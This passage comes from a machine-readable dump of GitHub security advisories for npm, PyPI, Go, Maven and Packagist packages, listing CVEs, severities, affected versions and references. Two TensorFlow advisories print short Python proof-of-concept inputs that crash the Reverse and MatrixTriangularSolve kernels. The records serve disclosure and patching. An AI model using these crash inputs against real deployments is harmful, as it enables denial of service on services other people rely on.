'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jspdf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7691'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/issues/2971'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-575255'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-575253'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-575254'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575252'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSPDF-568273'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T17:33:02Z', 'nvd_published_at': '2020-07-06T13:15:00Z'}" +1.4.0,GHSA-v659-54cx-g4qr,2021-05-25T20:44:52Z,2021-05-17T20:57:25Z,,['CVE-2021-25941'],Prototype Pollution in deep-override,Prototype pollution vulnerability in 'deep-override' versions 1.0.0 through 1.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'deep-override'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25941'}, {'type': 'WEB', 'url': 'https://github.com/ASaiAnudeep/deep-override/commit/2aced17651fb684959a6e04b1465a8329b3d5268'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25941'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T17:59:32Z', 'nvd_published_at': '2021-05-14T14:15:00Z'}" +1.4.0,GHSA-g4hj-r7r3-9rwv,2021-07-28T20:50:13Z,2021-05-07T16:15:37Z,,['CVE-2020-7601'],OS Command Injection in gulp-scss-lint,gulp-scss-lint through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands to the "exec" function located in "src/command.js" via the provided options.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gulp-scss-lint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7601'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GULPSCSSLINT-560114'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T21:58:01Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-5vm8-hhgr-jcjp,2021-05-27T21:29:43Z,2021-05-28T19:18:53Z,,[],Cross-site scripting vulnerability in TinyMCE,"### Impact +A cross-site scripting (XSS) vulnerability was discovered in the URL sanitization logic of the core parser for `form` elements. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or APIs, and then submitting the form. However, as TinyMCE does not allow forms to be submitted while editing, the vulnerability could only be triggered when the content was previewed or rendered outside of the editor. This impacts all users who are using TinyMCE 5.7.0 or lower. + +### Patches +This vulnerability has been patched in TinyMCE 5.7.1 by improved URL sanitization logic. + +### Workarounds +To work around this vulnerability, either: +- Upgrade to TinyMCE 5.7.1 or higher +- Manually sanitize `form` URL attributes using a [TinyMCE node filter](https://www.tiny.cloud/docs/api/tinymce.html/tinymce.html.domparser/#addnodefilter). +- Disable `form` elements in your content using the [invalid_elements](https://www.tiny.cloud/docs/configure/content-filtering/#invalid_elements) setting. + +#### Example: Sanitizing using a node filter +```js +editor.parser.addNodeFilter('form', function(nodes) { + nodes.forEach(function(node) { + if (node.attributes) { + node.attributes.forEach(function(attr) { + var name = attr.name; + var value = attr.value; + // Sanitize the attribute value here or remove it entirely + var sanitizedValue = ...; + node.attr(name, santizedValue); + }); + } + }); +}); +``` + +#### Example: Using invalid_elements +```js +invalid_elements: 'form' +``` + +### Acknowledgements +Tiny Technologies would like to thank Mikhail Khramenkov at Solar Security Research Team for discovering this vulnerability. + +### References +https://www.tiny.cloud/docs/release-notes/release-notes571/#securityfixes + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues) +* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)",[],"[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-5vm8-hhgr-jcjp'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:29:43Z', 'nvd_published_at': None}" +1.4.0,GHSA-qmfx-75ff-8mw6,2021-05-24T21:22:08Z,2021-05-27T18:41:00Z,,[],Listing of upload directory contents possible,"There's an security issue in prosody-filer versions **< 1.0.1** which leads to unwanted directory listings of download directories. + +An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectors other than `/upload/` (or the corresponding user defined root dir) + +Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings are blocked entirely.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/ThomasLeister/prosody-filer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ThomasLeister/prosody-filer/security/advisories/GHSA-qmfx-75ff-8mw6'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:22:08Z', 'nvd_published_at': None}" +1.4.0,GHSA-fxqh-cfjm-fp93,2021-05-18T20:48:50Z,2021-05-21T14:24:39Z,,['CVE-2021-29556'],Division by 0 in `Reverse`,"### Impact +An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.Reverse`: + +```python +import tensorflow as tf + +tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) +dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) + +tf.raw_ops.Reverse(tensor=tensor_input, dims=dims) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/36229ea9e9451dac14a8b1f4711c435a1d84a594/tensorflow/core/kernels/reverse_op.cc#L75-L76) performs a division based on the first dimension of the tensor argument: + +```cc +const int64 N = input.dim_size(0); +const int64 cost_per_unit = input.NumElements() / N; +``` + +Since this is controlled by the user, an attacker can trigger a denial of service. + +### Patches +We have patched the issue in GitHub commit [4071d8e2f6c45c1955a811fee757ca2adbe462c1](https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fxqh-cfjm-fp93'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29556'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:48:50Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-q26w-wjj2-22vv,2021-04-20T19:38:53Z,2021-05-10T18:47:36Z,,['CVE-2020-28249'],Cross-site scripting in Joplin,Joplin allows XSS via a LINK element in a note.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28249'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/fd90a490c0e5cacd17bfe0ffc422be1d2a9b1c13'}, {'type': 'WEB', 'url': 'https://github.com/fhlip0/JopinXSS'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/releases/tag/v1.3.11'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/joplin'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T19:38:53Z', 'nvd_published_at': '2020-11-06T07:15:00Z'}" +1.4.0,GHSA-g42g-737j-qx6j,2022-03-22T18:43:41Z,2021-05-28T19:49:59Z,,['CVE-2021-25735'],Access Restriction Bypass in kube-apiserver,"A vulnerability in Kubernetes `kube-apiserver` could allow node updates to bypass a _Validating Admission Webhook_ and allow unauthorized node updates. The information that is provided to the admission controller could contain old configurations that overwrite values used for validation. Since the overwriting takes place before the validation, this could lead the admission controller to accept requests that should be blocked. The vulnerability can be exploited when an update action on node resources is performed and an admission controller is in place and configured to validate the action. + +Users are only affected by this vulnerability if they are running a _Validating Admission Webhook_ for Nodes that denies admission based partially on the old state of the Node object. It only impacts validating admission plugins that rely on old values in certain fields and does not impact calls from kubelets that go through the built-in NodeRestriction admission plugin.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.20.5'}}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.19.9'}}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.18.17'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25735'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/100096'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/99946'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/commit/00e81db174ef7aca497be5f42d87e46d14df2a90'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1937562'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/FKAGqT4jx9Y'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/k8s.io/kubernetes@v1.23.5/cmd/kube-apiserver'}, {'type': 'WEB', 'url': 'https://sysdig.com/blog/cve-2021-25735-kubernetes-admission-bypass/'}]","{'cwe_ids': ['CWE-284', 'CWE-372', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-03-22T18:25:38Z', 'nvd_published_at': '2021-09-06T12:15:00Z'}" +1.4.0,GHSA-hwj9-h5mp-3pm3,2021-06-15T15:12:13Z,2021-05-10T15:29:24Z,,['CVE-2021-23368'],Regular Expression Denial of Service in postcss,The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'postcss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.36'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'postcss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23368'}, {'type': 'WEB', 'url': 'https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734'}, {'type': 'WEB', 'url': 'https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4'}, {'type': 'WEB', 'url': 'https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T17:26:38Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}" +1.4.0,GHSA-c57f-4vp2-jqhm,2021-10-05T16:29:35Z,2021-05-06T15:27:04Z,,[],Insecure temporary directory usage in frontend build functionality of Vaadin 14 and 15-19,"Insecure temporary directory usage in frontend build functionality of `com.vaadin:flow-server` versions 2.0.9 through 2.5.2 (Vaadin 14.0.3 through Vaadin 14.5.2), 3.0 prior to 6.0 (Vaadin 15 prior to 19), and 6.0.0 through 6.0.5 (Vaadin 19.0.0 through 19.0.4) allows local users to inject malicious code into frontend resources during application rebuilds. + +- https://vaadin.com/security/cve-2021-31411","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.9'}, {'fixed': '2.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '6.0.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-c57f-4vp2-jqhm'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow'}]","{'cwe_ids': ['CWE-379'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T17:54:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-m2q4-qghh-p9cq,2021-05-20T22:39:55Z,2021-05-21T19:21:38Z,,['CVE-2021-31779'],Server-Side Request Forgery in yoast_seo,The yoast_seo (aka Yoast SEO) extension before 7.2.1 for TYPO3 allows SSRF via a backend user account.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yoast-seo-for-typo3/yoast_seo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31779'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-006'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:39:55Z', 'nvd_published_at': '2021-04-28T07:15:00Z'}" +1.4.0,GHSA-6fw4-hr69-g3rv,2021-07-29T22:00:50Z,2021-05-06T17:29:47Z,,['CVE-2020-7707'],Prototype Pollution in property-expr,The package property-expr before 2.0.3 are vulnerable to Prototype Pollution via the setter function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'property-expr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7707'}, {'type': 'WEB', 'url': 'https://github.com/jquense/expr/commit/df846910915d59f711ce63c1f817815bceab5ff7'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-598857'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PROPERTYEXPR-598800'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:16:41Z', 'nvd_published_at': '2020-08-18T14:15:00Z'}" +1.4.0,GHSA-vqw6-72r7-fgw7,2021-05-18T21:14:11Z,2021-05-21T14:23:44Z,,['CVE-2021-29551'],OOB read in `MatrixTriangularSolve`,"### Impact +The implementation of [`MatrixTriangularSolve`](https://github.com/tensorflow/tensorflow/blob/8cae746d8449c7dda5298327353d68613f16e798/tensorflow/core/kernels/linalg/matrix_triangular_solve_op_impl.h#L160-L240) fails to terminate kernel execution if one validation condition fails: + +```cc +void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, + const Tensor& in1) override { + OP_REQUIRES( + ctx, in0.dims() >= 2, + errors::InvalidArgument(""In[0] ndims must be >= 2: "", in0.dims())); + + OP_REQUIRES( + ctx, in1.dims() >= 2, + errors::InvalidArgument(""In[0] ndims must be >= 2: "", in1.dims())); +} + +void Compute(OpKernelContext* ctx) override { + const Tensor& in0 = ctx->input(0); + const Tensor& in1 = ctx->input(1); + + ValidateInputTensors(ctx, in0, in1); + + MatMulBCast bcast(in0.shape().dim_sizes(), in1.shape().dim_sizes()); + ... +} +``` + +Since `OP_REQUIRES` only sets `ctx->status()` to a non-OK value and calls `return`, this allows malicious attackers to trigger an out of bounds read: + +```python +import tensorflow as tf +import numpy as np + +matrix_array = np.array([]) +matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(1,0)),dtype=tf.float32) +rhs_array = np.array([]) +rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(0,1)),dtype=tf.float32) + +tf.raw_ops.MatrixTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor,lower=False,adjoint=False) +``` + +As the two input tensors are empty, the `OP_REQUIRES` in `ValidateInputTensors` should fire and interrupt execution. However, given the implementation of `OP_REQUIRES`, after the `in0.dims() >= 2` fails, execution moves to the initialization of the `bcast` object. This initialization is done with invalid data and results in heap OOB read. + +### Patches +We have patched the issue in GitHub commit [480641e3599775a8895254ffbc0fc45621334f68](https://github.com/tensorflow/tensorflow/commit/480641e3599775a8895254ffbc0fc45621334f68). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vqw6-72r7-fgw7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29551'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/480641e3599775a8895254ffbc0fc45621334f68'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:14:11Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4mqv-gcr3-pff9,2023-09-11T15:01:31Z,2021-05-06T18:53:37Z,,['CVE-2020-7776'],Cross-site scripting in phpoffice/phpspreadsheet,This affects the package phpoffice/phpspreadsheet. The library is vulnerable to XSS when creating an html output from an excel file by adding a comment on any cell. The root cause of this issue is within the HTML writer where user comments are concatenated as part of link and this is returned as HTML.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpoffice/phpspreadsheet'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7776'}, {'type': 'WEB', 'url': 'https://github.com/PHPOffice/PhpSpreadsheet/commit/0ed5b800be2136bcb8fa9c1bdf59abc957a98845'}, {'type': 'WEB', 'url': 'https://github.com/PHPOffice/PhpSpreadsheet/blob/master/src/PhpSpreadsheet/Writer/Html.php%23L1792'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-PHPOFFICEPHPSPREADSHEET-1048856'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:12:55Z', 'nvd_published_at': '2020-12-09T17:15:00Z'}" +1.4.0,GHSA-h33p-5j96-w8qh,2023-09-07T20:01:18Z,2021-05-07T16:14:48Z,,['CVE-2020-7607'],OS Command Injection in gulkp-styledocco,gulp-styledocco through 0.0.3 allows execution of arbitrary commands. The argument `options` of the exports function in `index.js` can be controlled by users without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gulp-styledocco'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7607'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GULPSTYLEDOCCO-560126'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T19:28:29Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-5gqf-456p-4836,2021-05-18T18:48:55Z,2021-05-21T14:25:31Z,,['CVE-2021-29572'],Reference binding to nullptr in 